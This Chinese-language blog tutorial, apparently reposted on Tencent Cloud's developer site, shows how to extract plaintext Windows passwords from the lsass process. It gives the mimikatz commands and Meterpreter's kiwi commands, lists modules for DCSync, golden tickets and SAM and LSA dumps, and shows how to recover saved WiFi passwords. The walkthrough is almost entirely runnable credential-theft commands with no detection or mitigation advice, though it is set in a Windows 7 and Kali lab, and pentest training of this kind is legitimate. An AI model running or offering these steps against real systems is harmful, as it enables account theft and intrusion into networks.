获取Windows明文密码的方式
关于mimikatz
mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从lsass.exe进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。
项目地址
https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz
实验环境
- Windows 7
- Kali Linux
使用
运行mimikatz.exe 需要用管理员权限运行
分别输入下面命令
privilege::debug
sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了
怎么样,很简单吧!
当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码
但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
意思是在高版本中启用了mimikatz改用了kiwi。
好吧,既然提高了kiwi我们来看看kiwi怎么用
关于kiwi
meterpreter > help kiwi #查看帮助
Kiwi Commands
=============
Command Description
------- -----------
creds_all #列举所有凭据/所有的系统密码
creds_kerberos #列举所有kerberos凭据
creds_msv #列举所有msv凭据
creds_ssp #列举所有ssp凭据
creds_tspkg #列举所有tspkg凭据
creds_wdigest #列举所有wdigest凭据
dcsync #通过DCSync检索用户帐户信息
dcsync_ntlm #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create #创建黄金票据
kerberos_ticket_list #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
kerberos_ticket_use #使用kerberos票据
kiwi_cmd #kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令
lsa_dump_sam #dump出lsa的SAM
lsa_dump_secrets #dump出lsa的密文
password_change #修改密码
wifi_list #列出当前用户的wifi配置文件
wifi_list_shared #列出共享wifi配置文件/编码如,我们用wiki获取系统密码
creds_all
查看电脑连过的所有WiFi密码
wifi_list_shared 
当然你想非要在msfconsole中使用mimikatz的话,也不是没有办法,只需执行下面命令即可
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords换而言之,就是将kiwi命令与mimikatz两者相结合。
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2001225
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
腾讯云开发者
